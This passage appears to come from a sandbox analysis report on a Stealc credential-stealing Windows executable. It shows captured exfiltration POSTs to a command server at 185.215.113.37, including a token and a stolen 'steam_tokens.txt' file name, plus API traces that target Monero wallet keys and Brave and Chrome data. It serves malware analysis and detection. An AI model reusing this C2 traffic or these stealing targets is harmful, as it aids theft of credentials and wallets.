name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------BAAEHDBFIDAFIDHJEBFBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BAAEHDBFIDAFIDHJEBFBContent-Disposition: form-data; name="file"------BAAEHDBFIDAFIDHJEBFB--
Oct 3, 2024 18:38:27.432760954 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:26 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:27.467138052 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKE Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="message"ybncbhylepme------ECBAEBGHDAECBGDGCAKE--
Oct 3, 2024 18:38:27.720875978 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:27 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2338 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6f 66 66 69 63 65 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 [TRUNCATED] Data Ascii: .pl<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>.ar<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>*.br<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.offi
Oct 3, 2024 18:38:27.722686052 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBK Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GIJJKFCGDGHDHIECGCBK--
Oct 3, 2024 18:38:28.440362930 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:27 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	12:38:04
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x8a0000
File size:	1'852'416 bytes
MD5 hash:	49F94CA1E283413ADC5163D5FFA2C92A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1752059108.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1979573658.000000000125E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	23.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	28

Executed Functions

Function 008B9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01272240), ref: 008B98A1
GetProcAddress.KERNEL32(74DD0000,012723D8), ref: 008B98BA
GetProcAddress.KERNEL32(74DD0000,01272300), ref: 008B98D2
GetProcAddress.KERNEL32(74DD0000,01272258), ref: 008B98EA
GetProcAddress.KERNEL32(74DD0000,01272270), ref: 008B9903
GetProcAddress.KERNEL32(74DD0000,01279188), ref: 008B991B
GetProcAddress.KERNEL32(74DD0000,01265930), ref: 008B9933
GetProcAddress.KERNEL32(74DD0000,012658D0), ref: 008B994C
GetProcAddress.KERNEL32(74DD0000,01272420), ref: 008B9964
GetProcAddress.KERNEL32(74DD0000,01272318), ref: 008B997C
GetProcAddress.KERNEL32(74DD0000,01272330), ref: 008B9995
GetProcAddress.KERNEL32(74DD0000,01272348), ref: 008B99AD
GetProcAddress.KERNEL32(74DD0000,01265BD0), ref: 008B99C5
GetProcAddress.KERNEL32(74DD0000,01272360), ref: 008B99DE
GetProcAddress.KERNEL32(74DD0000,01272438), ref: 008B99F6
GetProcAddress.KERNEL32(74DD0000,01265950), ref: 008B9A0E
GetProcAddress.KERNEL32(74DD0000,01272378), ref: 008B9A27
GetProcAddress.KERNEL32(74DD0000,012723C0), ref: 008B9A3F
GetProcAddress.KERNEL32(74DD0000,01265970), ref: 008B9A57
GetProcAddress.KERNEL32(74DD0000,012723F0), ref: 008B9A70
GetProcAddress.KERNEL32(74DD0000,01265B10), ref: 008B9A88
LoadLibraryA.KERNEL32(01272498,?,008B6A00), ref: 008B9A9A
LoadLibraryA.KERNEL32(012724B0,?,008B6A00), ref: 008B9AAB
LoadLibraryA.KERNEL32(012724C8,?,008B6A00), ref: 008B9ABD
LoadLibraryA.KERNEL32(012724E0,?,008B6A00), ref: 008B9ACF
LoadLibraryA.KERNEL32(01272528,?,008B6A00), ref: 008B9AE0
GetProcAddress.KERNEL32(75A70000,012724F8), ref: 008B9B02
GetProcAddress.KERNEL32(75290000,01272510), ref: 008B9B23
GetProcAddress.KERNEL32(75290000,01272468), ref: 008B9B3B
GetProcAddress.KERNEL32(75BD0000,01272480), ref: 008B9B5D
GetProcAddress.KERNEL32(75450000,01265BF0), ref: 008B9B7E
GetProcAddress.KERNEL32(76E90000,01279178), ref: 008B9B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 008B9BB6

Strings

NtQueryInformationProcess, xrefs: 008B9BAA

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: fc4067b84bf907fb5d79119870a2b08d77ff3de09ec9b1df36330e413cdba007
Instruction ID: e450105993da072694e0b4033423b9389cf2544a5416fdbc51f738f8ad5950f6
Opcode Fuzzy Hash: fc4067b84bf907fb5d79119870a2b08d77ff3de09ec9b1df36330e413cdba007
Instruction Fuzzy Hash: 64A11EBA5002C09FD354EFE8EDD89563BF9F76C301715851EA605CB264D639B883CB62

Function 008A45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 008A460E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 008A479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A45D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A46C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A45DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A45F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A46CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A46D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A45E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A45C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A46B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A46AC

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 233f9482189bf3c907ee113ca2c6b92fa4a1ba4d69ac2046c3de079cf9a845da
Instruction ID: 52f6600e0b2e6bd79b68344aa160c8562b6cbcf737471883c40572542a3a80eb
Opcode Fuzzy Hash: 233f9482189bf3c907ee113ca2c6b92fa4a1ba4d69ac2046c3de079cf9a845da
Instruction Fuzzy Hash: 4441F2607C27046B8B24B7A4A86DFDD7776EF527C0F406058EC709A380DBB4B5C0495B

Function 008ABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

FindFirstFileA.KERNEL32(00000000,?,008C0B32,008C0B2B,00000000,?,?,?,008C13F4,008C0B2A), ref: 008ABEF5
StrCmpCA.SHLWAPI(?,008C13F8), ref: 008ABF4D
StrCmpCA.SHLWAPI(?,008C13FC), ref: 008ABF63
FindNextFileA.KERNEL32(000000FF,?), ref: 008AC7BF
FindClose.KERNEL32(000000FF), ref: 008AC7D1

Strings

Google Chrome, xrefs: 008AC634
Preferences, xrefs: 008AC11E
\Brave\Preferences, xrefs: 008AC1DB
Brave, xrefs: 008AC102

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
